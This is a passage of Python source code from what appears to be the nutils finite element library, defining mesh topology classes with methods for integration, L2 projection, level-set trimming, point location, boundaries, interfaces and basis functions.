Note that we could\n # have reused the result of an earlier lookup to avoid a new one (using index\n # instead of contains) but we choose to trade some speed for simplicity.\n references = self.references.take(ind_self).chain(other.references.take(ind_other))\n transforms = transformseq.chain([self.transforms[ind_self], other.transforms[ind_other]], self.ndims)\n opposites = transformseq.chain([self.opposites[ind_self], other.opposites[ind_other]], self.ndims)\n return Topology(references, transforms, opposites)\n\n __rand__ = lambda self, other: self.__and__(other)\n\n def __add__(self, other):\n return self | other\n\n def __sub__(self, other):\n assert isinstance(other, Topology) and other.ndims == self.ndims\n return other.__rsub__(self)\n\n def __rsub__(self, other):\n assert isinstance(other, Topology) and other.ndims == self.ndims\n return other - other.subset(self, newboundary=getattr(self,'boundary',None))\n\n def __mul__(self, other):\n return ProductTopology(self, other)\n\n @property\n def border_transforms(self):\n indices = set()\n for btrans in self.boundary.transforms:\n try:\n ielem, tail = self.transforms.index_with_tail(btrans)\n except ValueError:\n pass\n else:\n indices.add(ielem)\n return self.transforms[numpy.array(sorted(indices), dtype=int)]\n\n @property\n def refine_iter(self):\n topo = self\n while True:\n yield topo\n topo = topo.refined\n\n @property\n def _index_coords(self):\n index = function.transforms_index(self.transforms)\n coords = function.transforms_coords(self.transforms, self.ndims)\n return index, coords\n\n @property\n def f_index(self):\n '''The evaluable index of the element in this topology.'''\n\n return self._index_coords[0]\n\n @property\n def f_coords(self):\n '''The evaluable element local coordinates.'''\n\n return self._index_coords[1]\n\n def basis(self, name, *args, **kwargs):\n '''\n Create a basis.\n '''\n if self.ndims == 0:\n return function.PlainBasis([[1]], [[0]], 1, self.f_index, self.f_coords)\n split = name.split('-', 1)\n if len(split) == 2 and split[0] in ('h', 'th'):\n name = split[1] # default to non-hierarchical bases\n if split[0] == 'th':\n kwargs.pop('truncation_tolerance', None)\n f = getattr(self, 'basis_' + name)\n return f(*args, **kwargs)\n\n def sample(self, ischeme, degree):\n 'Create sample.'\n\n points = PointsSequence.from_iter((ischeme(reference, degree) for reference in self.references), self.ndims) if callable(ischeme) \\\n else self.references.getpoints(ischeme, degree)\n transforms = self.transforms,\n if len(self.transforms) == 0 or self.opposites != self.transforms:\n transforms += self.opposites,\n return Sample.new(transforms, points)\n\n @util.single_or_multiple\n def integrate_elementwise(self, funcs, *, degree, asfunction=False, ischeme='gauss', arguments=None):\n 'element-wise integration'\n\n retvals = [sparse.toarray(retval) for retval in self.sample(ischeme, degree).integrate_sparse(\n [function.kronecker(func, pos=self.f_index, length=len(self), axis=0) for func in funcs], arguments=arguments)]\n if asfunction:\n return [function.Elemwise(retval, self.f_index, dtype=float) for retval in retvals]\n else:\n return retvals\n\n @util.single_or_multiple\n def elem_mean(self, funcs, geometry=None, ischeme='gauss', degree=None, **kwargs):\n ischeme, degree = element.parse_legacy_ischeme(ischeme if degree is None else ischeme + str(degree))\n funcs = (1,)+funcs\n if geometry is not None:\n funcs = [func * function.J(geometry, self.ndims) for func in funcs]\n area, *integrals = 
self.integrate_elementwise(funcs, ischeme=ischeme, degree=degree, **kwargs)\n return [integral / area[(slice(None),)+(_,)*(integral.ndim-1)] for integral in integrals]\n\n @util.single_or_multiple\n def integrate(self, funcs, ischeme='gauss', degree=None, edit=None, *, arguments=None, title='integrate'):\n 'integrate functions'\n\n ischeme, degree = element.parse_legacy_ischeme(ischeme if degree is None else ischeme + str(degree))\n if edit is not None:\n funcs = [edit(func) for func in funcs]\n return self.sample(ischeme, degree).integrate(funcs, **arguments or {})\n\n def integral(self, func, ischeme='gauss', degree=None, edit=None):\n 'integral'\n\n ischeme, degree = element.parse_legacy_ischeme(ischeme if degree is None else ischeme + str(degree))\n if edit is not None:\n func = edit(func)\n return self.sample(ischeme, degree).integral(func)\n\n def projection(self, fun, onto, geometry, **kwargs):\n 'project and return as function'\n\n weights = self.project(fun, onto, geometry, **kwargs)\n return onto.dot(weights)\n\n @log.withcontext\n def project(self, fun, onto, geometry, ischeme='gauss', degree=None, droptol=1e-12, exact_boundaries=False, constrain=None, verify=None, ptype='lsqr', edit=None, *, arguments=None, **solverargs):\n 'L2 projection of function onto function space'\n\n log.debug('projection type:', ptype)\n\n if degree is not None:\n ischeme += str(degree)\n if constrain is None:\n constrain = util.NanVec(onto.shape[0])\n else:\n constrain = constrain.copy()\n if exact_boundaries:\n constrain |= self.boundary.project(fun, onto, geometry, constrain=constrain, ischeme=ischeme, droptol=droptol, ptype=ptype, edit=edit, arguments=arguments)\n assert isinstance(constrain, util.NanVec)\n assert constrain.shape == onto.shape[:1]\n\n avg_error = None # setting this depends on projection type\n\n if ptype == 'lsqr':\n assert ischeme is not None, 'please specify an integration scheme for lsqr-projection'\n fun2 = function.asarray(fun)**2\n if len(onto.shape) == 1:\n Afun = function.outer(onto)\n bfun = onto * fun\n elif len(onto.shape) == 2:\n Afun = function.outer(onto).sum(2)\n bfun = function.sum(onto * fun, -1)\n if fun2.ndim:\n fun2 = fun2.sum(-1)\n else:\n raise Exception\n assert fun2.ndim == 0\n J = function.J(geometry, self.ndims)\n A, b, f2, area = self.integrate([Afun*J,bfun*J,fun2*J,J], ischeme=ischeme, edit=edit, arguments=arguments)\n N = A.rowsupp(droptol)\n if numpy.equal(b, 0).all():\n constrain[~constrain.where&N] = 0\n avg_error = 0.\n else:\n solvecons = constrain.copy()\n solvecons[~(constrain.where|N)] = 0\n u = A.solve(b, constrain=solvecons, **solverargs)\n constrain[N] = u[N]\n err2 = f2 - numpy.dot(2 * b - A @ u, u) # can be negative ~zero due to rounding errors\n avg_error = numpy.sqrt(err2) / area if err2 > 0 else 0\n\n elif ptype == 'convolute':\n assert ischeme is not None, 'please specify an integration scheme for convolute-projection'\n if len(onto.shape) == 1:\n ufun = onto * fun\n afun = onto\n elif len(onto.shape) == 2:\n ufun = function.sum(onto * fun, axis=-1)\n afun = function.norm2(onto)\n else:\n raise Exception\n J = function.J(geometry, self.ndims)\n u, scale = self.integrate([ufun*J, afun*J], ischeme=ischeme, edit=edit, arguments=arguments)\n N = ~constrain.where & (scale > droptol)\n constrain[N] = u[N] / scale[N]\n\n elif ptype == 'nodal':\n\n ## data = evaluable.Tuple([fun, onto])\n ## F = W = 0\n ## for elem in self:\n ## f, w = data(elem, 'bezier2')\n ## W += w.sum(axis=-1).sum(axis=0)\n ## F += numeric.contract(f[:,_,:], w, 
axis=[0,2])\n ## I = (W!=0)\n\n F = numpy.zeros(onto.shape[0])\n W = numpy.zeros(onto.shape[0])\n I = numpy.zeros(onto.shape[0], dtype=bool)\n fun = function.asarray(fun).prepare_eval(ndims=self.ndims)\n data = evaluable.Tuple(evaluable.Tuple([fun, onto_f.simplified, evaluable.Tuple(onto_ind)]) for onto_ind, onto_f in evaluable.blocks(onto.prepare_eval(ndims=self.ndims)))\n for ref, trans, opp in zip(self.references, self.transforms, self.opposites):\n ipoints = ref.getpoints('bezier2')\n for fun_, onto_f_, onto_ind_ in data.eval(_transforms=(trans, opp), _points=ipoints, **arguments or {}):\n onto_f_ = onto_f_.swapaxes(0,1) # -> dof axis, point axis, ...\n indfun_ = fun_[(slice(None),)+numpy.ix_(*onto_ind_[1:])]\n assert onto_f_.shape[0] == len(onto_ind_[0])\n assert onto_f_.shape[1:] == indfun_.shape\n W[onto_ind_[0]] += onto_f_.reshape(onto_f_.shape[0],-1).sum(1)\n F[onto_ind_[0]] += (onto_f_ * indfun_).reshape(onto_f_.shape[0],-1).sum(1)\n I[onto_ind_[0]] = True\n\n I[constrain.where] = False\n constrain[I] = F[I] / W[I]\n\n else:\n raise Exception('invalid projection {!r}'.format(ptype))\n\n numcons = constrain.where.sum()\n info = 'constrained {}/{} dofs'.format(numcons, constrain.size)\n if avg_error is not None:\n info += ', error {:.2e}/area'.format(avg_error)\n log.info(info)\n if verify is not None:\n assert numcons == verify, 'number of constraints does not meet expectation: {} != {}'.format(numcons, verify)\n\n return constrain\n\n def refined_by(self, refine):\n 'create refined space by refining dofs in existing one'\n\n return HierarchicalTopology(self, [numpy.arange(len(self))]).refined_by(refine)\n\n @property\n def refined(self):\n return RefinedTopology(self)\n\n def refine(self, n):\n 'refine entire topology n times'\n\n if numpy.iterable(n):\n assert len(n) == self.ndims\n assert all(ni == n[0] for ni in n)\n n = n[0]\n return self if n <= 0 else self.refined.refine(n-1)\n\n def trim(self, levelset, maxrefine, ndivisions=8, name='trimmed', leveltopo=None, *, arguments=None):\n 'trim element along levelset'\n\n if arguments is None:\n arguments = {}\n\n levelset = levelset.prepare_eval(ndims=self.ndims).optimized_for_numpy\n refs = []\n if leveltopo is None:\n with log.iter.percentage('trimming', self.references, self.transforms, self.opposites) as items:\n for ref, trans, opp in items:\n levels = levelset.eval(_transforms=(trans, opp), _points=ref.getpoints('vertex', maxrefine), **arguments)\n refs.append(ref.trim(levels, maxrefine=maxrefine, ndivisions=ndivisions))\n else:\n log.info('collecting leveltopo elements')\n bins = [set() for ielem in range(len(self))]\n for trans in leveltopo.transforms:\n ielem, tail = self.transforms.index_with_tail(trans)\n bins[ielem].add(tail)\n fcache = cache.WrapperCache()\n with log.iter.percentage('trimming', self.references, self.transforms, bins) as items:\n for ref, trans, ctransforms in items:\n levels = numpy.empty(ref.nvertices_by_level(maxrefine))\n cover = list(fcache[ref.vertex_cover](frozenset(ctransforms), maxrefine))\n # confirm cover and greedily optimize order\n mask = numpy.ones(len(levels), dtype=bool)\n while mask.any():\n imax = numpy.argmax([mask[indices].sum() for tail, points, indices in cover])\n tail, points, indices = cover.pop(imax)\n levels[indices] = levelset.eval(_transforms=(trans + tail,), _points=points, **arguments)\n mask[indices] = False\n refs.append(ref.trim(levels, maxrefine=maxrefine, ndivisions=ndivisions))\n log.debug('cache', fcache.stats)\n return SubsetTopology(self, refs, 
newboundary=name)\n\n def subset(self, topo, newboundary=None, strict=False):\n 'intersection'\n refs = [ref.empty for ref in self.references]\n for ref, trans in zip(topo.references, topo.transforms):\n try:\n ielem = self.transforms.index(trans)\n except ValueError:\n assert not strict, 'elements do not form a strict subset'\n else:\n subref = self.references[ielem] & ref\n if strict:\n assert subref == ref, 'elements do not form a strict subset'\n refs[ielem] = subref\n if not any(refs):\n return EmptyTopology(self.ndims)\n return SubsetTopology(self, refs, newboundary)\n\n def withgroups(self, vgroups={}, bgroups={}, igroups={}, pgroups={}):\n return WithGroupsTopology(self, vgroups, bgroups, igroups, pgroups) if vgroups or bgroups or igroups or pgroups else self\n\n withsubdomain = lambda self, **kwargs: self.withgroups(vgroups=kwargs)\n withboundary = lambda self, **kwargs: self.withgroups(bgroups=kwargs)\n withinterfaces = lambda self, **kwargs: self.withgroups(igroups=kwargs)\n withpoints = lambda self, **kwargs: self.withgroups(pgroups=kwargs)\n\n @log.withcontext\n def volume(self, geometry, ischeme='gauss', degree=1, *, arguments=None):\n return self.integrate(function.J(geometry, self.ndims), ischeme=ischeme, degree=degree, arguments=arguments)\n\n @log.withcontext\n def check_boundary(self, geometry, elemwise=False, ischeme='gauss', degree=1, tol=1e-15, print=print, *, arguments=None):\n if elemwise:\n for ref in self.references:\n ref.check_edges(tol=tol, print=print)\n volume = self.volume(geometry, ischeme=ischeme, degree=degree, arguments=arguments)\n J = function.J(geometry, self.ndims-1)\n zeros, volumes = self.boundary.integrate([geometry.normal()*J, geometry*geometry.normal()*J], ischeme=ischeme, degree=degree, arguments=arguments)\n if numpy.greater(abs(zeros), tol).any():\n print('divergence check failed: {} != 0'.format(zeros))\n if numpy.greater(abs(volumes - volume), tol).any():\n print('divergence check failed: {} != {}'.format(volumes, volume))\n\n def indicator(self, subtopo):\n '''Create an indicator function for a subtopology.'''\n\n if isinstance(subtopo, str):\n subtopo = self[subtopo]\n values = numpy.zeros([len(self)], dtype=int)\n values[numpy.fromiter(map(self.transforms.index, subtopo.transforms), dtype=int)] = 1\n return function.get(values, 0, self.f_index)\n\n def select(self, indicator, ischeme='bezier2', **kwargs):\n sample = self.sample(*element.parse_legacy_ischeme(ischeme))\n isactive = numpy.greater(sample.eval(indicator, **kwargs), 0)\n selected = types.frozenarray(tuple(i for i, index in enumerate(sample.index) if isactive[index].any()), dtype=int)\n return self[selected]\n\n @log.withcontext\n def locate(self, geom, coords, *, tol=0, eps=0, maxiter=0, arguments=None, weights=None, maxdist=None, ischeme=None, scale=None):\n '''Create a sample based on physical coordinates.\n\n In a finite element application, functions are commonly evaluated in points\n that are defined on the topology. The reverse, finding a point on the\n topology based on a function value, is often a nonlinear process and as\n such involves Newton iterations. The ``locate`` function facilitates this\n search process and produces a :class:`nutils.sample.Sample` instance that\n can be used for the subsequent evaluation of any function in the given\n physical points.\n\n Example:\n\n >>> from . 
import mesh\n >>> domain, geom = mesh.unitsquare(nelems=3, etype='mixed')\n >>> sample = domain.locate(geom, [[.9, .4]], tol=1e-12)\n >>> sample.eval(geom).tolist()\n [[0.9, 0.4]]\n\n Locate requires a geometry function, an array of coordinates, and at least\n one of ``tol`` and ``eps`` to set the tolerance in physical or element\n space, respectively; if both are specified the least restrictive takes\n precedence.\n\n Args\n ----\n geom : 1-dimensional :class:`nutils.function.Array`\n Geometry function of length ``ndims``.\n coords : 2-dimensional :class:`float` array\n Array of coordinates with ``ndims`` columns.\n tol : :class:`float` (default: 0)\n Maximum allowed distance in physical coordinates between target and\n located point.\n eps : :class:`float` (default: 0)\n Maximum allowed distance in element coordinates between target and\n located point.\n maxiter : :class:`int` (default: 0)\n Maximum allowed number of Newton iterations, or 0 for unlimited.\n arguments : :class:`dict` (default: None)\n Arguments for function evaluation.\n weights : :class:`float` array (default: None)\n Optional weights, in case ``coords`` are quadrature points, making the\n resulting sample suitable for integration.\n maxdist : :class:`float` (default: None)\n Speed up failure by setting a physical distance between point and\n element centroid above which the element is rejected immediately. If\n all points are expected to be located then this can safely be left\n unspecified.\n\n Returns\n -------\n located : :class:`nutils.sample.Sample`\n '''\n\n if ischeme is not None:\n warnings.deprecation('the ischeme argument is deprecated and will be removed in future')\n if scale is not None:\n warnings.deprecation('the scale argument is deprecated and will be removed in future')\n if max(tol, eps) <= 0:\n raise ValueError('locate requires either tol or eps to be strictly positive')\n coords = numpy.asarray(coords, dtype=float)\n if geom.ndim == 0:\n geom = geom[_]\n coords = coords[...,_]\n if not geom.shape == coords.shape[1:] == (self.ndims,):\n raise ValueError('invalid geometry or point shape for {}D topology'.format(self.ndims))\n centroids = self.sample('_centroid', None).eval(geom)\n assert len(centroids) == len(self)\n ielems = parallel.shempty(len(coords), dtype=int)\n points = parallel.shempty((len(coords),len(geom)), dtype=float)\n _ielem = evaluable.Argument('_locate_ielem', shape=(), dtype=int)\n _point = evaluable.Argument('_locate_point', shape=(self.ndims,))\n lower_args = dict(\n transform_chains = (\n evaluable.TransformChainFromSequence(self.transforms, _ielem),\n evaluable.TransformChainFromSequence(self.opposites, _ielem)),\n coordinates = (_point, _point))\n xJ = evaluable.Tuple((geom.lower(**lower_args), function.localgradient(geom, self.ndims).lower(**lower_args))).simplified\n arguments = dict(arguments or ())\n with parallel.ctxrange('locating', len(coords)) as ipoints:\n for ipoint in ipoints:\n xt = coords[ipoint] # target\n dist = numpy.linalg.norm(centroids - xt, axis=1)\n for ielem in numpy.argsort(dist) if maxdist is None \\\n else sorted((dist < maxdist).nonzero()[0], key=dist.__getitem__):\n ref = self.references[ielem]\n arguments['_locate_ielem'] = ielem\n arguments['_locate_point'] = p = numpy.array(ref.centroid)\n ex = ep = numpy.inf\n iiter = 0\n while ex > tol and ep > eps: # newton loop\n if iiter > maxiter > 0:\n break # maximum number of iterations reached\n iiter += 1\n xp, Jp = xJ.eval(**arguments)\n dx = xt - xp\n ex0 = ex\n ex = numpy.linalg.norm(dx)\n if ex >= 
ex0:\n break # newton is diverging\n try:\n dp = numpy.linalg.solve(Jp, dx)\n except numpy.linalg.LinAlgError:\n break # jacobian is singular\n ep = numpy.linalg.norm(dp)\n p += dp # NOTE: modifies arguments['_locate_point'] in place\n else:\n if ref.inside(p, max(eps, ep)):\n ielems[ipoint] = ielem\n points[ipoint] = p\n break\n else:\n raise LocateError('failed to locate point: {}'.format(xt))\n return self._sample(ielems, points, weights)\n\n def _sample(self, ielems, coords, weights=None):\n uielems = numpy.unique(ielems)\n points_ = []\n index = []\n for ielem in uielems:\n w, = numpy.equal(ielems, ielem).nonzero()\n points_.append(points.CoordsPoints(coords[w]) if weights is None\n else points.CoordsWeightsPoints(coords[w], weights[w]))\n index.append(w)\n transforms = self.transforms[uielems],\n if len(self.transforms) == 0 or self.opposites != self.transforms:\n transforms += self.opposites[uielems],\n points_ = PointsSequence.from_iter(points_, self.ndims)\n return Sample.new(transforms, points_, index)\n\n def revolved(self, geom):\n '''Create revolved topology, geometry.'''\n\n assert geom.ndim == 1\n revdomain = self * RevolutionTopology()\n angle = function.RevolutionAngle()\n geom, angle = function.bifurcate(geom, angle)\n revgeom = function.concatenate([geom[0] * function.trignormal(angle), geom[1:]])\n simplify = _identity\n return revdomain, revgeom, simplify\n\n def extruded(self, geom, nelems, periodic=False, bnames=('front','back')):\n assert geom.ndim == 1\n root = transform.Identifier(1, 'extrude')\n extopo = self * StructuredLine(root, i=0, j=nelems, periodic=periodic, bnames=bnames)\n exgeom = function.concatenate(function.bifurcate(geom, function.rootcoords(1)))\n return extopo, exgeom\n\n @property\n @log.withcontext\n def boundary(self):\n '''\n :class:`Topology`:\n The boundary of this topology.\n '''\n\n references = []\n selection = []\n iglobaledgeiter = itertools.count()\n refs_touched = False\n for ielem, (ioppelems, elemref, elemtrans) in enumerate(zip(self.connectivity, self.references, self.transforms)):\n for (edgetrans, edgeref), ioppelem, iglobaledge in zip(elemref.edges, ioppelems, iglobaledgeiter):\n if edgeref:\n if ioppelem == -1:\n references.append(edgeref)\n selection.append(iglobaledge)\n else:\n ioppedge = self.connectivity[ioppelem].index(ielem)\n ref = edgeref - self.references[ioppelem].edge_refs[ioppedge]\n if ref:\n references.append(ref)\n selection.append(iglobaledge)\n refs_touched = True\n selection = types.frozenarray(selection, int)\n if refs_touched:\n references = References.from_iter(references, self.ndims-1)\n else:\n references = self.references.edges[selection]\n transforms = self.transforms.edges(self.references)[selection]\n return Topology(references, transforms, transforms)\n\n @property\n @log.withcontext\n def interfaces(self):\n references = []\n selection = []\n oppselection = []\n iglobaledgeiter = itertools.count()\n refs_touched = False\n edges = self.transforms.edges(self.references)\n if self.references.isuniform:\n _nedges = self.references[0].nedges\n offset = lambda ielem: ielem * _nedges\n else:\n offset = numpy.cumsum([0]+list(ref.nedges for ref in self.references)).__getitem__\n for ielem, (ioppelems, elemref, elemtrans) in enumerate(zip(self.connectivity, self.references, self.transforms)):\n for (edgetrans, edgeref), ioppelem, iglobaledge in zip(elemref.edges, ioppelems, iglobaledgeiter):\n if edgeref and -1 < ioppelem < ielem:\n ioppedge = self.connectivity[ioppelem].index(ielem)\n oppedgetrans, 
oppedgeref = self.references[ioppelem].edges[ioppedge]\n ref = oppedgeref and edgeref & oppedgeref\n if ref:\n references.append(ref)\n selection.append(iglobaledge)\n oppselection.append(offset(ioppelem)+ioppedge)\n if ref != edgeref:\n refs_touched = True\n selection = types.frozenarray(selection, int)\n oppselection = types.frozenarray(oppselection, int)\n if refs_touched:\n references = References.from_iter(references, self.ndims-1)\n else:\n references = self.references.edges[selection]\n return Topology(references, edges[selection], edges[oppselection])\n\n def basis_spline(self, degree):\n assert degree == 1\n return self.basis('std', degree)\n\n def basis_discont(self, degree):\n 'discontinuous shape functions'\n\n assert numeric.isint(degree) and degree >= 0\n if self.references.isuniform:\n coeffs = [self.references[0].get_poly_coeffs('bernstein', degree=degree)]*len(self.references)\n else:\n coeffs = [ref.get_poly_coeffs('bernstein', degree=degree) for ref in self.references]\n return function.DiscontBasis(coeffs, self.f_index, self.f_coords)\n\n def _basis_c0_structured(self, name, degree):\n 'C^0-continuous shape functions with lagrange structure'\n\n assert numeric.isint(degree) and degree >= 0\n\n if degree == 0:\n raise ValueError('Cannot build a C^0-continuous basis of degree 0. Use basis \\'discont\\' instead.')\n\n coeffs = [ref.get_poly_coeffs(name, degree=degree) for ref in self.references]\n offsets = numpy.cumsum([0] + [len(c) for c in coeffs])\n dofmap = numpy.repeat(-1, offsets[-1])\n for ielem, ioppelems in enumerate(self.connectivity):\n for iedge, jelem in enumerate(ioppelems): # loop over element neighbors and merge dofs\n if jelem < ielem:\n continue # either there is no neighbor along iedge or situation will be inspected from the other side\n jedge = self.connectivity[jelem].index(ielem)\n idofs = offsets[ielem] + self.references[ielem].get_edge_dofs(degree, iedge)\n jdofs = offsets[jelem] + self.references[jelem].get_edge_dofs(degree, jedge)\n for idof, jdof in zip(idofs, jdofs):\n while dofmap[idof] != -1:\n idof = dofmap[idof]\n while dofmap[jdof] != -1:\n jdof = dofmap[jdof]\n if idof != jdof:\n dofmap[max(idof, jdof)] = min(idof, jdof) # create left-looking pointer\n # assign dof numbers left-to-right\n ndofs = 0\n for i, n in enumerate(dofmap):\n if n == -1:\n dofmap[i] = ndofs\n ndofs += 1\n else:\n dofmap[i] = dofmap[n]\n\n elem_slices = map(slice, offsets[:-1], offsets[1:])\n dofs = tuple(types.frozenarray(dofmap[s]) for s in elem_slices)\n return function.PlainBasis(coeffs, dofs, ndofs, self.f_index, self.f_coords)\n\n def basis_lagrange(self, degree):\n 'lagrange shape functions'\n return self._basis_c0_structured('lagrange', degree)\n\n def basis_bernstein(self, degree):\n 'bernstein shape functions'\n return self._basis_c0_structured('bernstein', degree)\n\n basis_std = basis_bernstein\n\nstricttopology = types.strict[Topology]\n\nclass LocateError(Exception):\n pass\n\nclass WithGroupsTopology(Topology):\n 'item topology'\n\n __slots__ = 'basetopo', 'vgroups', 'bgroups', 'igroups', 'pgroups'\n __cache__ = 'refined',\n\n @types.apply_annotations\n def __init__(self, basetopo:stricttopology, vgroups:types.frozendict={}, bgroups:types.frozendict={}, igroups:types.frozendict={}, pgroups:types.frozendict={}):\n assert vgroups or bgroups or igroups or pgroups\n self.basetopo = basetopo\n self.vgroups = vgroups\n self.bgroups = bgroups\n self.igroups = igroups\n self.pgroups = pgroups\n super().__init__(basetopo.references, basetopo.transforms, 
basetopo.opposites)\n assert all(topo is Ellipsis or isinstance(topo, str) or isinstance(topo, Topology) and topo.ndims == basetopo.ndims for topo in self.vgroups.values())\n\n def __len__(self):\n return len(self.basetopo)\n\n def getitem(self, item):\n if isinstance(item, str) and item in self.vgroups:\n itemtopo = self.vgroups[item]\n return itemtopo if isinstance(itemtopo, Topology) else self.basetopo[itemtopo]\n return self.basetopo.getitem(item)\n\n @property\n def border_transforms(self):\n return self.basetopo.border_transforms\n\n @property\n def connectivity(self):\n return self.basetopo.connectivity\n\n @property\n def boundary(self):\n return self.basetopo.boundary.withgroups(self.bgroups)\n\n @property\n def interfaces(self):\n baseitopo = self.basetopo.interfaces\n igroups = self.igroups.copy()\n for name, topo in self.igroups.items():\n if isinstance(topo, Topology):\n # last minute orientation fix\n s = []\n for transs in zip(topo.transforms, topo.opposites):\n for trans in transs:\n try:\n s.append(baseitopo.transforms.index(trans))\n break\n except ValueError:\n continue\n else:\n raise ValueError('group is not a subset of topology')\n s = types.frozenarray(tuple(sorted(s)), dtype=int)\n igroups[name] = Topology(baseitopo.references[s], baseitopo.transforms[s], baseitopo.opposites[s])\n return baseitopo.withgroups(igroups)\n\n @property\n def points(self):\n ptopos = []\n pnames = []\n topo = self\n while isinstance(topo, WithGroupsTopology):\n for pname, ptopo in topo.pgroups.items():\n if pname not in pnames:\n pnames.append(pname)\n ptopos.append(ptopo)\n topo = topo.basetopo\n return UnionTopology(ptopos, pnames)\n\n def basis(self, name, *args, **kwargs):\n return self.basetopo.basis(name, *args, **kwargs)\n\n @property\n def refined(self):\n groups = [{name: topo.refined if isinstance(topo,Topology) else topo for name, topo in groups.items()} for groups in (self.vgroups,self.bgroups,self.igroups,self.pgroups)]\n return self.basetopo.refined.withgroups(*groups)\n\nclass OppositeTopology(Topology):\n 'opposite topology'\n\n __slots__ = 'basetopo',\n\n def __init__(self, basetopo):\n self.basetopo = basetopo\n super().__init__(basetopo.references, basetopo.opposites, basetopo.transforms)\n\n def getitem(self, item):\n return ~(self.basetopo.getitem(item))\n\n def __len__(self):\n return len(self.basetopo)\n\n def __invert__(self):\n return self.basetopo\n\nclass EmptyTopology(Topology):\n 'empty topology'\n\n __slots__ = ()\n\n @types.apply_annotations\n def __init__(self, ndims:types.strictint):\n super().__init__(References.empty(ndims), transformseq.EmptyTransforms(ndims), transformseq.EmptyTransforms(ndims))\n\n def __or__(self, other):\n assert self.ndims == other.ndims\n return other\n\n def __rsub__(self, other):\n return other\n\nclass Point(Topology):\n 'point'\n\n __slots__ = ()\n\n @types.aspreprocessor\n @types.apply_annotations\n def _preprocess_init(self, trans:transform.stricttransform, opposite:transform.stricttransform=None):\n return (self, trans, trans if opposite is None else opposite), {}\n\n @_preprocess_init\n def __init__(self, trans, opposite):\n assert trans[-1].fromdims == 0\n references = References.uniform(element.getsimplex(0), 1)\n transforms = transformseq.PlainTransforms((trans,), 0)\n opposites = transforms if opposite is None else transformseq.PlainTransforms((opposite,), 0)\n super().__init__(references, transforms, opposites)\n\ndef StructuredLine(root:transform.stricttransformitem, i:types.strictint, j:types.strictint, 
periodic:bool=False, bnames:types.tuple[types.strictstr]=None):\n if bnames is None:\n bnames = ('_structured_line_dummy_boundary_name_',) * 2\n return StructuredTopology(root, axes=(transformseq.DimAxis(i,j,j if periodic else 0,periodic),), nrefine=0, bnames=(bnames,))\n\nclass StructuredTopology(Topology):\n 'structured topology'\n\n __slots__ = 'root', 'axes', 'nrefine', 'shape', '_bnames'\n __cache__ = 'connectivity', 'boundary', 'interfaces'\n\n @types.apply_annotations\n def __init__(self, root:transform.stricttransformitem, axes:types.tuple[types.strict[transformseq.Axis]], nrefine:types.strictint=0, bnames:types.tuple[types.tuple[types.strictstr]]=(('left', 'right'), ('bottom', 'top'), ('front', 'back'))):\n 'constructor'\n\n assert all(len(bname) == 2 for bname in bnames)\n\n self.root = root\n self.axes = axes\n self.nrefine = nrefine\n self.shape = tuple(axis.j - axis.i for axis in self.axes if axis.isdim)\n self._bnames = bnames\n\n references = References.uniform(util.product(element.getsimplex(1 if axis.isdim else 0) for axis in self.axes), len(self))\n transforms = transformseq.StructuredTransforms(self.root, self.axes, self.nrefine)\n nbounds = len(self.axes) - len(self.shape)\n if nbounds == 0:\n opposites = transforms\n else:\n axes = [axis.opposite(nbounds-1) for axis in self.axes]\n opposites = transformseq.StructuredTransforms(self.root, axes, self.nrefine)\n\n super().__init__(references, transforms, opposites)\n\n def __repr__(self):\n return '{}<{}>'.format(type(self).__qualname__, 'x'.join(str(axis.j-axis.i)+('p' if axis.isperiodic else '') for axis in self.axes if axis.isdim))\n\n def __len__(self):\n return numpy.prod(self.shape, dtype=int)\n\n def getitem(self, item):\n if not isinstance(item, tuple):\n return EmptyTopology(self.ndims)\n assert all(isinstance(it,slice) for it in item) and len(item) <= self.ndims\n if all(it == slice(None) for it in item): # shortcut\n return self\n axes = []\n idim = 0\n for axis in self.axes:\n if axis.isdim and idim < len(item):\n axis = axis.getitem(item[idim])\n idim += 1\n axes.append(axis)\n return StructuredTopology(self.root, axes, self.nrefine, bnames=self._bnames)\n\n @property\n def periodic(self):\n dimaxes = (axis for axis in self.axes if axis.isdim)\n return tuple(idim for idim, axis in enumerate(dimaxes) if axis.isdim and axis.isperiodic)\n\n @property\n def connectivity(self):\n connectivity = numpy.empty(self.shape+(self.ndims,2), dtype=int)\n connectivity[...] 
= -1\n ielems = numpy.arange(len(self)).reshape(self.shape)\n for idim in range(self.ndims):\n s = (slice(None),)*idim\n s1 = s + (slice(1,None),)\n s2 = s + (slice(0,-1),)\n connectivity[s2+(...,idim,0)] = ielems[s1]\n connectivity[s1+(...,idim,1)] = ielems[s2]\n if idim in self.periodic:\n connectivity[s+(-1,...,idim,0)] = ielems[s+(0,)]\n connectivity[s+(0,...,idim,1)] = ielems[s+(-1,)]\n return types.frozenarray(connectivity.reshape(len(self), self.ndims*2), copy=False)\n\n @property\n def boundary(self):\n 'boundary'\n\n nbounds = len(self.axes) - self.ndims\n btopos = [StructuredTopology(root=self.root, axes=self.axes[:idim] + (bndaxis,) + self.axes[idim+1:], nrefine=self.nrefine, bnames=self._bnames)\n for idim, axis in enumerate(self.axes)\n for bndaxis in axis.boundaries(nbounds)]\n if not btopos:\n return EmptyTopology(self.ndims-1)\n bnames = [bname for bnames, axis in zip(self._bnames, self.axes) if axis.isdim and not axis.isperiodic for bname in bnames]\n return DisjointUnionTopology(btopos, bnames)\n\n @property\n def interfaces(self):\n 'interfaces'\n\n assert self.ndims > 0, 'zero-D topology has no interfaces'\n itopos = []\n nbounds = len(self.axes) - self.ndims\n for idim, axis in enumerate(self.axes):\n if not axis.isdim:\n continue\n axes = (*self.axes[:idim], axis.intaxis(nbounds, side=True), *self.axes[idim+1:])\n oppaxes = (*self.axes[:idim], axis.intaxis(nbounds, side=False), *self.axes[idim+1:])\n itransforms = transformseq.StructuredTransforms(self.root, axes, self.nrefine)\n iopposites = transformseq.StructuredTransforms(self.root, oppaxes, self.nrefine)\n ireferences = References.uniform(util.product(element.getsimplex(1 if a.isdim else 0) for a in axes), len(itransforms))\n itopos.append(Topology(ireferences, itransforms, iopposites))\n assert len(itopos) == self.ndims\n return DisjointUnionTopology(itopos, names=['dir{}'.format(idim) for idim in range(self.ndims)])\n\n def _basis_spline(self, degree, knotvalues=None, knotmultiplicities=None, continuity=-1, periodic=None):\n 'spline with structure information'\n\n if periodic is None:\n periodic = self.periodic\n\n if numeric.isint(degree):\n degree = [degree]*self.ndims\n\n assert len(degree) == self.ndims\n\n if knotvalues is None or isinstance(knotvalues[0], (int,float)):\n knotvalues = [knotvalues] * self.ndims\n else:\n assert len(knotvalues) == self.ndims\n\n if knotmultiplicities is None or 